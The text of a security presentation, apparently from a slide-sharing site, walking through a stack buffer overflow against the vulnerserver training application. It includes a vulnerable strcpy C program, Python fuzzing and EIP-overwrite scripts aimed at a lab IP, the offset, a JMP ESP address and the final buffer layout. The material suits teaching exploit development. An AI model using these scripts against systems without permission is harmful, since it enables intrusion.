Post on 16-Jul-2015
Disclaimer
@cyberkryption
The views expressed within this presentation or afterwards are my own and in no way represent my employer.
The following presentation describes how to conduct a buffer overflow attack.
These attacks are illegal to perform against systems that you do not have explicit permission to test.
I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.
Caveat: With knowledge comes responsibility
Who am I
@cyberkryption
Who is This?
Von Neuman Explained..
Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec
Phrack 49
Meet the Stack
Each program has it's own stack as a memory structure.
Program data such as variable are also saved
Data is 'pushed' on to the stack and 'popped' off the stack
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
A Vulnerable 'C' program
#include<stdio.h>int main(int argc, char *argv[]){ char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0;}
We defined a character of size 20 bytes, it reserves some space on the stack
We copy the buffer using string copy without checking it's size
If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!
Stack Overwrite
Data on the stack is overwritten.
Extra input overwrites other data in the stack
Eventually the instruction pointer is overwritten and we have control!!!
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Meet the CPU Registers & Pointers
CPU PointersEIP = Points to the next address in memory to be executedESP = Stack Pointer. EBP = Stack Pointer Base Pointer
If we can overwrite EIP we can control execution flow other wise it's a DOS exploit.
CPU RegistersEAX AccumulatorEBX Base RegisterECX Counter RegisterEDX Data Register
Meet vulnserver
Initial Fuzzing#!/usr/bin/python
import socket
server = '192.168.1.65'
port = 9999
length = int(raw_input('Length of attack: '))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
Initial Fuzzing - Video
Initial Crash - Video
Path to Victory
Determine Buffer Length. Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.Enough space for shellcode?
Determine JMP ESP location ?
Resolve any bad characters
'A' *3000 / ESP = Buffer
????????
????????
????????
EIP Hunting#!/usr/bin/python
import socket
server = '192.168.1.65'
port = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending Evil Buffer to TRUN ."
attack = " < insert cyclic pattern here> "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
EIP Hunting – Cyclic Pattern Crash
How to Locate EIP Overwrite
● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register
● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters.
● Lastly use pattern offset to find EIP overwrite
● Use convert.sh for HEX to ASCII conversion
Locating EIP Offset - Video
EIP Hunting Part II#!/usr/bin/pythonimport socketserver = '192.168.1.65'sport = 9999
prefix = 'A' * 2006eip = 'BBBB'padding = 'F' * (3000 - 2006 - 4)attack = prefix + eip + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect = s.connect((server, sport))print s.recv(1024)print "Sending Buffer to TRUN "s.send(('TRUN .' + attack + '\r\n'))print s.recv(1024)s.send('EXIT\r\n')print s.recv(1024)s.close()
EIP & Buffer Space Confirmed
Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes
Path to Victory
Determine Buffer Length. Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.Enough space for shellcode?
Determine JMP ESP location ?
Resolve any bad characters
'A' *3000 / ESP = Buffer
4 Bytes > 2006 + 980 bytes shellcode
EIP Overwite 'A' * 2006 Shellcode
Buffer Construction
????????
????????
Determining JMP ESP Memory Location
Path to Victory
Determine Buffer Length. Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.Enough space for shellcode?
Determine JMP ESP location ?
Resolve any bad characters
'A' *3000 / ESP = Buffer
4 Bytes > 2006 + 980 bytes shellcode
EIP Overwite 'A' * 2006 Shellcode
Buffer Construction
625011AF in essfunc.dll
????????
The Bad Character Problem
Hex Dec Description--- --- ---------------------------------------------0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument
Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!
Determining Bad Characters
Determining Bad Characters
Path to Victory
Determine Buffer Length. Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.Enough space for shellcode?
Determine JMP ESP location ?
Resolve any bad characters
'A' *3000 / ESP = Buffer
4 Bytes > 2006 980 bytes shellcode
EIP Overwite 'A' * 2006 Shellcode
Buffer Construction
625011AF in essfunc.dll
0x00
Lets Create some Shellcode
Final Buffer Structure & Operation
625011AF
EIP Overwite 'A' * 2006 Shellcode NOP Sled
JMP ESP
Buffer Overflow starts here
Execution to 625011AF
JMP ESP in 625011AF redirects to NOP SLED
Shellcode Runs
\xCC Breakpoint
Breakpoint Activated
Putting it all together
CVE2012-5958 /5959
CVE2012-5958 /5959
Questions ????
TWITTER: @cyberkryption
BLOG: cyberkryption.wordpress.com